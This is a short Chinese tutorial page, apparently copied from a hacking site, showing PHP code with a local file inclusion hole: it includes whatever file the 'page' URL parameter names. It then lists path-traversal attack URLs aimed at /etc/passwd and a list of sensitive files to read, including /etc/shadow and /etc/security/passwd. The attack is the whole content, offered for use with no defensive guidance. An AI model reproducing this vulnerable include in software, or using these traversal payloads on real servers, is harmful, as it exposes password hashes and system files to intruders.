手机
当前位置:查字典教程网 >编程开发 >php教程 >php 伪造本地文件包含漏洞的代码
php 伪造本地文件包含漏洞的代码
摘要:代码:复制代码代码如下:你可以这样使用http://www.xxx.com/index.php?page=../etc/passwdhttp...

代码:

复制代码 代码如下:

<?php

$page=$_GET['page'];

include($page.'php');

?>

你可以这样使用

http://www.xxx.com/index.php?page=../etc/passwd

http://www.xxx.com/index.php?page=../../../etc/passwd

http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:

etc/profile

etc/services

/etc/passwd

/etc/shadow

/etc/group

/etc/security/group

/etc/security/passwd

/etc/security/user

/etc/security/environ

/etc/security/limits

/usr/lib/security/mkuser.default

来自hackteach

【php 伪造本地文件包含漏洞的代码】相关文章:

PHP实现文件安全下载

php环境上传大文件需要注意的事项

使用PHP维护文件系统

php函数重载的替代方法

php中文件上传的安全问题

多文件上载系统完整版

一个多文件上传的例子(原创)

php将图片文件转换成二进制输出的方法

php使用指定编码导出mysql数据到csv文件的方法

删除无限级目录与文件代码共享

精品推荐
分类导航